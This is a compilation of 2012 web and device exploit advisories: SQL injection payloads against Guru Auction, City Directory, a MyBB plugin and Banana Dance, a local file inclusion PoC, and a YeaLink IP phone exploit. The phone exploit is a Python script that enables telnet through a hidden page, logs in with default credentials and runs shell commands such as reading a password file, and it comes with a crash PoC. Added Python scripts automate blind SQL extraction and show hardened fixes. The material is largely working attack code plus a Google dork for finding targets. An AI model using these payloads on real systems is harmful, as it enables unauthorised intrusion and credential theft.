Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Multiple SQL injection vulnerabilities have been found in Guru Auction 2.0. A UNION-based injection in "subcat.php?cate_id=" and a boolean-based blind injection in "detail.php?item_id=" allow data such as the admin table to be read. The discoverers' descriptions of where the vulnerabilities occur, how they are used and the risk they pose are as follows:

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
										.WEB.ID
-----------------------------------------------------------------------
        Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://ycl.sch.id/
Date		: December, 26-2012
Location	: Yogyakarta, Indonesia
Time Zone	: GMT +7:00

Application	: Guru Auction 2.0
Price		: $49
Vendor  	: http://www.guruscript.com/
Google Dork	: inurl:subcat.php?cate_id=
-----------------------------------------------------------------------

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--


Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
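The two PoC URLs above show one true and one false answer from the blind injection point; in practice the page is used as a one-bit oracle and queried repeatedly. The script below automates that against a constructed, in-memory SQLite stand-in for detail.php?item_id=. It is an added Python 3 example, not code from the v3n0m advisory or from Guru Auction; the table layout, the admin row and the exact query shape of detail.php are assumptions, and MySQL's ASCII(SUBSTRING()) is spelled unicode(substr()) in SQLite. The hardened variant at the end is the fix a practitioner would apply: parse the id as an integer and bind it.

```python
import sqlite3

# Constructed sample data standing in for the Guru Auction database (assumption).
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE items (item_id INTEGER PRIMARY KEY, title TEXT);
INSERT INTO items VALUES (575, 'Vintage radio');
CREATE TABLE admin (user_name TEXT, password TEXT);
INSERT INTO admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
""")


def vulnerable_detail_page(item_id):
    """Mimics detail.php: item_id is concatenated straight into the WHERE clause.
    Returns True when an item is rendered, i.e. the 'true' response in the PoC."""
    sql = "SELECT title FROM items WHERE item_id=" + item_id   # unsanitised on purpose
    return db.execute(sql).fetchone() is not None


def oracle(condition):
    """One request. Item 575 exists, so the page is 'true' exactly when the
    injected condition holds, same as '575 AND SUBSTRING(@@version,1,1)=5'."""
    return vulnerable_detail_page("575 AND (" + condition + ")")


def extract(subquery, max_len=64):
    """Recover a string one character at a time, binary-searching the code point
    so each character costs about 7 requests instead of one per guess."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle("unicode(substr((%s),%d,1)) > %d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        # substr() past the end yields '' and unicode('') is NULL, so every
        # comparison is false and lo stays 0: end of string.
        if lo == 0:
            break
        out += chr(lo)
    return out


def hardened_detail_page(item_id):
    """The fix: reject anything that is not an integer, then bind it as a parameter."""
    try:
        n = int(item_id)
    except ValueError:
        return False
    row = db.execute("SELECT title FROM items WHERE item_id=?", (n,)).fetchone()
    return row is not None


if __name__ == "__main__":
    print(oracle("1=1"), oracle("1=2"))
    print(extract("SELECT password FROM admin LIMIT 1"))
    print(hardened_detail_page("575"), hardened_detail_page("575 AND 1=1"))
```

Against a real target each oracle() call is an HTTP request and the true/false decision is made on the response body or status, so the comparison should be resilient to noise (compare a stable page fragment, not the whole body).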


Default Admin Page:
~~~~~~~~~~
http://domain.tld/[path]/admin/

-----------------------------------------------------------------------

Thanks:

LeQhi, lingah, Ozie, m4rc0, g0nz, L1ntang, GheMaX, chainloader, SakitJiwa, Susant, dextone, drubicza, f4c0

City Directory Review and Rating Script (search.php) SQL Injection Vulnerability

An SQL injection vulnerability has been found in City Directory Review and Rating Script (search.php); the discoverer's notes on it are as follows:

# Exploit Title: City Directory Review and Rating Script SQL Injection Vulnerability
# Date: 22.12.2012
# Author: 3spi0n
# Script Vendor or Software Link:
http://b-scripts.com/en/18-city-reviewer-yelp-clone.html
# Category: WebApps
# Type: SQL Injection [MySQLi]
# Tested On: Ubuntu 12.10 - Win7

=================================================
# Demo: http://b-scripts.com/demo/city_reviewer/

# MySQLi Detected On:
http://server/city_reviewer/search.php?category=6


=================================================

# My Blog: www.Ryuzaki.in
# Social : Twitter.com/bariiiscan
# My Team: Grayhatz Inc. & Agedz Corp.
# Turkey.

MyBB AwayList Plugin (index.php, id parameter) SQL Injection Vulnerability

SQL injection vulnerabilities have been found in the MyBB AwayList plugin. The vulnerability stems from index.php?action=editAwlItem&id=[SQLi]; the discoverer's notes on exploiting it are as follows.

# Exploit Title: AwayList MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [Team Vect0r]
# Software Link: http://mods.mybb.com/view/awaylist
# Tested on: Windows & Linux.


Vulnerable code :

<?php
// AwayList plugin, editAwlItem action: the request parameter is concatenated
// into the WHERE clause of the query as-is.
$query = $db->simple_select(
    "awaylist", '*', "id = '" . $mybb->input['id'] . "'"
);
$item = $db->fetch_array($query);
?>

The variable '$mybb->input['id']' remains unsanitized.

Usage : http://server/index.php?action=editAwlItem&id=[SQLi]

Shoutout to Zixem <3 & Team Vect0r :3

YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 Multiple Vulnerabilities

Multiple vulnerabilities have been found in YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100: [0x01] a hidden page that enables telnet, also reachable via CSRF; [0x02] default telnet shell users and passwords, with a readable shadow file. The Python exploit and the discoverer's descriptions of where the vulnerabilities occur and how they are used are as follows:

#+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 Multiple Vulnerabilities
# Date : 12-21-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : http://yealink.com/SupportDownloadfiles_detail.aspx?ProductsID=64&CateID=187&flag=142
# Vendor site : http://yealink.com
# Version : 9.70.0.100 and lower
# Tested on : YeaLink IP Phone SIP-T20P (hardware VoIP phone)
#
# Vulnerability : Multiple Vulnerabilities as described below
#
#+--------------------------------------------------------------------------------------------------------------------------------+

[0x01] - Hidden page to enable telnet + CSRF

The hidden page http://<IP>/cgi-bin/ConfigManApp.com?Id=10 contains an option to enable Telnet on the phone. Only the "admin" user can access this page. However the unprivileged user "user" can post directly to ConfigManApp.com and enable Telnet. This default user "user" has the password "user" and is unlikely to be changed by a user.

Also CSRF to enable this is possible:

<html>
<head>
<title>Download</title>
</head>
<body>
<form name="csrf" action="http://<IP>/cgi-bin/ConfigManApp.com" method="post">
<input type="hidden" name="PAGEID" value="10"/>
<input type="hidden" name="CONFIG_DATA" value="1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260"/>
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>

[0x02] - Default telnet shell users + passwords

The shell users are hardcoded in the firmware images and are always the same and can't be changed through the web interface. So after enabling telnet through the hidden page shell access could go unnoticed.

/etc/passwd:
root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:501:501:Guest,,,:/:/bin/sh

/etc/shadow:
root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::   <- password is "guest"

/etc/group:
root:x:0:admin,root
guest:x:1:guest

The file "/tmp/.htpasswd" is world readable and contains the "admin" password for the web interface.

[0x03] - Exploit

The following exploit logs in with the unprivileged user "user" and password "user" in the web interface. Here it enables telnet, logs in with the default user "guest" and password "guest" and executes the shell command specified. An example is to do a "cat /tmp/.htpasswd" to retrieve the admin password for the web interface.

#!/usr/bin/python
import urllib, urllib2, getpass, sys, telnetlib

print ""
print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 hidden page telnet enabler + default guest shell account command execution - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
print ""

if (len(sys.argv) != 3):
    print "[*] Usage: " + sys.argv[0] + " <IP of Phone> <command to execute>"
    print "[*] i.e.:" + sys.argv[0] + " 127.0.0.1 \"cat /tmp/.htpasswd\""
    print ""
    exit(0)

phoneIP = sys.argv[1]
shellCmd = sys.argv[2]
phoneUrl = 'http://%s/cgi-bin/ConfigManApp.com' % phoneIP
webUser = 'user'
webPass = 'user'
telnetUser = 'guest'
telnetPass = 'guest'

# HTTP basic auth as the unprivileged default web user
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, phoneUrl, webUser, webPass)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)

# Same POST body as the CSRF page above: PAGEID=10 turns telnet on
post_params = urllib.urlencode([("PAGEID", "10"), ("CONFIG_DATA", "1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260")])
print "[*] Enable telnet on [ %s ] by posting directly to the hidden page with PAGEID=10 parameter as unprivileged user [ user ]" % phoneUrl
pagehandle = urllib2.urlopen(phoneUrl, post_params)

print "[*] Making telnet connection to [ %s ] with default user [ %s ] and password [ %s ]" % ( phoneIP, telnetUser, telnetPass )
tn = telnetlib.Telnet(phoneIP)
tn.read_until("IPPHONE login: ")
tn.write(telnetUser + "\n")
if telnetPass:
    tn.read_until("Password: ")
    tn.write(telnetPass + "\n")
tn.read_until("$")

print "[*] Executing shell command [ %s ]" % shellCmd
tn.write( shellCmd + '\n' )
tn.read_until( shellCmd )
print tn.read_until("$").strip("$ ")
tn.write("exit\n")
tn.read_all()

[0x04] - Remote "/yealink/bin/macd" buffer overflow crash PoC

The following PoC exploit will crash the "/yealink/bin/macd" process on port "12345"

#!/usr/bin/python
import socket,sys,time,struct

if len(sys.argv) < 2:
    print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
    print "[-] Usage: %s <target addr> " % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]
if len(sys.argv) > 2:
    platform = sys.argv[2]

# 75 bytes of 'A' is enough to crash macd
buffer = "\x41"*75

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,12345))
except:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)

print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21"
print "[*] Sending " + `len(buffer)` + " byte crash"
s.send(buffer + "\r\n")
s.recv(1024)

Banana Dance B.2.6 Multiple Vulnerabilities

Local file inclusion, improper access control and SQL injection vulnerabilities have been found in Banana Dance B.2.6; the discoverer's detailed notes on where the vulnerabilities occur, how they are exploited and their impact are as follows:

Advisory ID: HTB23118
Product: Banana Dance
Vendor: bananadance.org
Vulnerable Version(s): B.2.6 and probably prior
Tested Version: B.2.6
Vendor Notification: October 3, 2012 
Public Disclosure: December 19, 2012 
Vulnerability Type: PHP File Inclusion [CWE-98], Improper Access Control [CWE-284], SQL Injection [CWE-89]
CVE References: CVE-2012-5242, CVE-2012-5243, CVE-2012-5244
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Banana Dance, which can be exploited to gain access to sensitive information, perform SQL injection attacks and compromise vulnerable system.


1) PHP File Inclusion in Banana Dance: CVE-2012-5242 

Input passed via the "name" POST parameter to "/functions/ajax.php" is not properly verified before being used in "include_once()" function and can be exploited to include arbitrary local files. This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.

The following PoC (Proof-of-Concept) demonstrates the vulnerability: 


POST /functions/ajax.php HTTP/1.1

action=get_template&name=../../../../../etc/passwd%00
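The PoC relies on two things: the traversal sequence walks out of the template directory, and the trailing %00 drops whatever suffix the script appends (a NUL byte truncated paths passed to PHP filesystem functions before PHP 5.3.4). The Python 3 script below reproduces that path construction on a constructed directory tree and shows the containment check that stops it. It is an added example, not High-Tech Bridge's or Banana Dance's code; the directory layout, the ".tpl" suffix and the file contents are assumptions.

```python
import os
import re
import tempfile

# Constructed layout standing in for a Banana Dance install (assumption):
#   <root>/www/functions/templates/<name>.tpl   legitimate templates
#   <root>/secret.txt                           a file outside the web root
ROOT = tempfile.mkdtemp()
TEMPLATES = os.path.join(ROOT, "www", "functions", "templates")
os.makedirs(TEMPLATES)
with open(os.path.join(TEMPLATES, "header.tpl"), "w") as f:
    f.write("<h1>header template</h1>")
with open(os.path.join(ROOT, "secret.txt"), "w") as f:
    f.write("root:x:0:0:root:/root:/bin/sh")   # stands in for /etc/passwd


def include_vulnerable(name):
    """include_once($dir . $name . '.tpl') as it behaved before PHP 5.3.4: the
    path reaches a C string API, so everything after the first NUL is ignored."""
    path = TEMPLATES + os.sep + name + ".tpl"
    path = path.split("\x00", 1)[0]          # emulate NUL truncation
    with open(path) as f:
        return f.read()


SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+$")


def include_hardened(name):
    """Allow-list the name, then prove the resolved path is still inside TEMPLATES.
    The second check is defence in depth for the case the allow-list is loosened."""
    if not SAFE_NAME.match(name):
        raise ValueError("rejected template name")
    base = os.path.realpath(TEMPLATES)
    path = os.path.realpath(os.path.join(base, name + ".tpl"))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes template directory")
    with open(path) as f:
        return f.read()


def demo():
    # Three '..' climb templates -> functions -> www -> ROOT, like the advisory's
    # ../../../../../etc/passwd%00 climbs to the filesystem root.
    payload = "../../../secret.txt\x00"
    leaked = include_vulnerable(payload)
    try:
        include_hardened(payload)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked, include_hardened("header")


if __name__ == "__main__":
    leaked, blocked, legit = demo()
    print("vulnerable include returned:", leaked)
    print("hardened include blocked payload:", blocked)
    print("hardened include of 'header':", legit)
```

On a current PHP the NUL byte is rejected outright, but the traversal alone still works wherever the appended suffix is absent or the attacker can reach a file that happens to end with it, so the allow-list and the realpath containment check are both still needed.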



2) Improper Access Control in Banana Dance: CVE-2012-5243

The application does not restrict access to the "/functions/suggest.php" script to unauthenticated users. A remote attacker can read arbitrary information from database.

The following PoC reads data from the 'bd_users' table: 


<form action="http://[host]/functions/suggest.php" method="post">
<input type="hidden" name="return" value="username" />
<input type="hidden" name="display" value="password" />
<input type="hidden" name="table" value="bd_users" />
<input type="hidden" name="search" value="id" />
<input type="hidden" name="value" value="%" />
<input type="submit" id="btn">
</form>



3) SQL Injection in Banana Dance: CVE-2012-5244

3.1 Input passed via the "return", "display", "table" and "search" POST parameters to "/functions/suggest.php" is not properly sanitised before being used in SQL query. Although the "mysql_real_escape_string()" function is called on the input it has no effect due to usage of the ` quotes in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code. 

The following PoC demonstrates the vulnerability: 


<form action="http://[host]/functions/suggest.php" method="post">
<input type="hidden" name="return" value="id`,version() AS version FROM bd_users LIMIT 1 -- " />
<input type="hidden" name="display" value="version" />
<input type="submit" id="btn">
</form>
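Sections 2) and 3.1 describe the same handler from two angles: suggest.php takes its table and column names from the request without a session check, and the escaping it applies only protects string literals, so input placed between backticks is free to close the identifier and continue the statement. The Python 3 script below runs both PoC shapes against a constructed in-memory SQLite stand-in and then shows the corrected handler. It is an added example, not High-Tech Bridge's or Banana Dance's code; the query template of suggest.php, the table contents and the allow-list are assumptions, and MySQL's version() becomes sqlite_version().

```python
import sqlite3

# Constructed stand-in for the Banana Dance database (assumption).
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE bd_users (id INTEGER, username TEXT, password TEXT);
INSERT INTO bd_users VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
CREATE TABLE bd_pages (id INTEGER, title TEXT);
INSERT INTO bd_pages VALUES (1, 'Home');
""")


def mysql_real_escape_string(s):
    """The characters PHP's mysql_real_escape_string() escapes. It is built for
    string literals: a backtick is not on the list and passes through."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\n": "\\n",
             "\r": "\\r", "\x00": "\\0", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


def suggest_vulnerable(return_col, display_col, table, search_col, value):
    """Assumed shape of suggest.php: every identifier comes from the request,
    escaping is applied everywhere, and nobody checks for a logged-in user."""
    r, d, t, s, v = (mysql_real_escape_string(x)
                     for x in (return_col, display_col, table, search_col, value))
    sql = "SELECT `%s` AS val, `%s` AS label FROM `%s` WHERE `%s` LIKE '%s'" % (r, d, t, s, v)
    return [tuple(row) for row in db.execute(sql)]


ALLOWED = {"bd_pages": {"id", "title"}}   # table -> columns this endpoint may expose


def suggest_hardened(return_col, display_col, table, search_col, value, authenticated):
    """Identifiers cannot be bound as parameters, so they are allow-listed; the
    LIKE value is the only data and gets a placeholder; the caller must be logged in."""
    if not authenticated:
        raise PermissionError("login required")
    cols = ALLOWED.get(table)
    if cols is None or not {return_col, display_col, search_col} <= cols:
        raise ValueError("table/column not permitted")
    sql = "SELECT `%s` AS val, `%s` AS label FROM `%s` WHERE `%s` LIKE ?" % (
        return_col, display_col, table, search_col)
    return [tuple(row) for row in db.execute(sql, (value,))]


def demo():
    # 2) CVE-2012-5243: the form from the advisory, field for field, no login.
    dump = suggest_vulnerable("username", "password", "bd_users", "id", "%")
    # 3.1) CVE-2012-5244: close the backtick, supply our own SELECT list,
    # comment out the rest of the original statement.
    injected = suggest_vulnerable(
        "id`, sqlite_version() AS label FROM bd_users LIMIT 1 -- ", "x", "y", "z", "%")
    return dump, injected


if __name__ == "__main__":
    dump, injected = demo()
    print("unauthenticated dump:", dump)
    print("identifier injection:", injected)
    print("hardened:", suggest_hardened("title", "title", "bd_pages", "title", "H%", True))
```

Note what the escape function did to the injected value: nothing, because the payload contains no quote characters. That is why "the function is called but has no effect" in 3.1; the fix is not a different escape routine but keeping identifiers out of user control altogether.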


3.2 Input passed via the "id" GET parameter to "/functions/widgets.php" is not properly sanitised before being used in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC demonstrates the vulnerability: 

http://[host]/functions/widgets.php?action=get_widget&id=%27%20OR%201=%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2b1%29%2%29%29%29%20--%20

3.3 Input passed via the "category" GET parameter to "/functions/print.php" is not properly sanitised before being used in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC demonstrates the vulnerability: 

http://[host]/functions/print.php?category=0%27%20UNION%20SELECT%20version%28%29%20--%202

3.4 Input passed via the "name" GET parameter to "/functions/ajax.php" is not properly sanitised before being used in SQL query. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC demonstrates the vulnerability: 


<form action="http://[host]/functions/ajax.php" method="post">
<input type="hidden" name="action" value="get_template" />
<input type="hidden" name="name" value="' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- " />
<input type="submit" id="btn">
</form>


-----------------------------------------------------------------------------------------------

Solution:

Vendor didn't provide a security patch and declined proposal to postpone the disclosure date. 

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23118 - https://www.htbridge.com/advisory/HTB23118 - Multiple vulnerabilities in Banana Dance.
[2] Banana Dance - http://www.bananadance.org - Banana Dance is a free, open source, PHP/MySQL program that takes the best of wiki software and combines it with the best of web content management systems (CMS).
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.